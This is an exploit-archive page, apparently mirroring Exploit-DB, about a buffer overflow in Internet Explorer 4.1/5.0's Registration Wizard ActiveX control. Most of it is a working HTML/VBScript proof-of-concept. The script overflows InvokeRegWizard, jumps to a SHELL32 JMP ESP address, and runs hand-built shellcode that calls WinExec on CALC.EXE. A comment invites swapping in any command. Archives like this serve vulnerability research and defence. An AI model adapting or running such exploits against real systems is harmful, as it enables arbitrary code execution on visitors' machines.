Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Microsoft Internet Explorer 4.1/5.0 for Windows 95/Windows NT 4,Windows 98 Registration Wizard Buffer Overflow Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Shane Hird
7.5
CVSS
HIGH
Buffer Overflow
Buffer Overflow
CWE
Product Name: Internet Explorer
Affected Version From: Internet Explorer 4.1
Affected Version To: Internet Explorer 5.0
Patch Exists: NO
Related CWE: Unknown
CPE: a:microsoft:internet_explorer:4.1
Metasploit:
Other Scripts:
Platforms Tested: Windows 95, Windows NT 4, Windows 98
Unknown

Microsoft Internet Explorer 4.1/5.0 for Windows 95/Windows NT 4,Windows 98 Registration Wizard Buffer Overflow Vulnerability

There is a buffer overflow in the Internet Explorer Registration Wizard control (regwizc.dll). This control is marked 'Safe for Scripting'. Arbitrary commands may be executed if the control is run in a malicious manner.

Mitigation:

Unknown
Source

Exploit-DB raw data:

Microsoft Internet Explorer 4.1/5.0 for Windows 95/Windows NT 4,Windows 98 Registration Wizard Buffer Overflow Vulnerability

source: https://www.securityfocus.com/bid/671/info


There is a buffer overflow in the Internet Explorer Registration Wizard control (regwizc.dll). This control is marked 'Safe for Scripting' . Arbitrary commands may be executed if the control is run in a malicious manner. 

REGWIZC

The Registration Wizard control used by Microsoft to 
register MS products also contains a buffer overrun in 
the 'InvokeRegWizard' method. When called with a long 
string, pre-pended with '/i', we can gain control of the 
RET address and exploit the control in a similar manner as 
the PDF control. This exploit will cause a 'Regwiz.log' 
file to be created in the temporary directory, and once 
again will execute CALC.EXE and terminate the host.

<object classid="clsid:50E5E3D1-C07E-11D0-B9FD-
00A0249F6B00" id="RegWizObj">
</object>

<script language="VbScript" ><!--

msgbox("Registration Wizard Buffer Overrun" + Chr(10) 
+ "Written by Shane Hird")

expstr = "/i 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

'We overflowed to the RET point of the stack
'No NULL's allowed so ret to <JMP ESP> in Shell32

expstr = expstr & Chr(235)	'Address in SHELL32, Win98 
(7FD035EB) of JMP ESP
expstr = expstr & Chr(53)	'You may need to use a 
different address
expstr = expstr & Chr(208)
expstr = expstr & Chr(127)


'NOP for debugging purposes
expstr = expstr + Chr(144)

'MOV EDI, ESP
expstr = expstr + Chr(139) + Chr(252)

'ADD EDI, 19 (Size of code)
expstr = expstr + Chr(131) + Chr(199) + Chr(25)

'PUSH EAX (Window Style EAX = 41414141)
expstr = expstr + Chr(80)

'PUSH EDI (Address of command line)
expstr = expstr + Chr(87)

'MOV EDX, BFFA0960 (WinExec, Win98)
expstr = expstr + Chr(186) + Chr(96) + Chr(9) + Chr(250) + 
Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'XOR EAX, EAX
expstr = expstr + Chr(51) + Chr(192)

'PUSH EAX
expstr = expstr + Chr(80)

'MOV EDX, BFF8D4CA (ExitProcess, Win98)
expstr = expstr + Chr(186) + Chr(202) + Chr(212) + Chr(248) 
+ Chr(191)

'CALL EDX
expstr = expstr + Chr(255) + Chr(210)

'Replace with any command + 0 (automatically appended)
expstr = expstr + "CALC.EXE"

RegWizObj.InvokeRegWizard(expstr)

--></script>

Navigation

Suggest Exploit

Services By CQR